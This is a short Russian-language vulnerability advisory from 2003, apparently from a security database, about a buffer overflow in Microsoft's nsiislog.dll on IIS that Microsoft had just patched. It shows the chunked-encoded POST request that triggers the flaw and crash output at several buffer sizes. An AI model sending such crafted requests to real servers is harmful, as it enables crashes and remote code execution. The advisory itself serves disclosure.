Дата публикации: | 03.06.2003 |
Всего просмотров: | 1047 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | На прошлой неделе Microsoft выпустила патч, в котором устраняется уязвимость nsiislog.dll. Сейчас раскрываются подробности обнаруженной уязвимости.
Уязвимость обнаружена в пути, которым nsiislog.dll обрабатывает поступающие запросы. Атакующий может послать специально сформированный запрос серверу, чтобы аварийно завершить работу IIS Web сервера. Уязвимость связанна с переполнением буфера в nsiislog.dll при регистрации некоторых некорректных запросов. Посылая chunked encoded POST к nsiislog.dll, можно вызвать переполнение буфера. Пример: POST /scripts/nsiislog.dll HTTP/1.1 Transfer-Encoding: chunked PostLength PostData 0 Using Size: 121 Connecting....Sending Buffer.... 78003F25 dec dword ptr [ecx+0ACh] - 7800F5ED dec dword ptr [esi] ESI = 58585858 Using Size: 510 Connecting....Sending Buffer.... 77FC8FE1 mov dword ptr [ecx],eax EAX = 58585858 ECX = 58585858 Using Size: 5000 Connecting....Sending Buffer.... 40F01DCC rep movs dword ptr [edi],dword ptr [esi] - 77FC8FE1 mov dword ptr [ecx],eax EAX = 58585858 ECX = 58585858Уязвимость может использоваться для выполнения произвольного кода на уязвимой системе |
Ссылки: | Windows Media Services Remote Command Execution |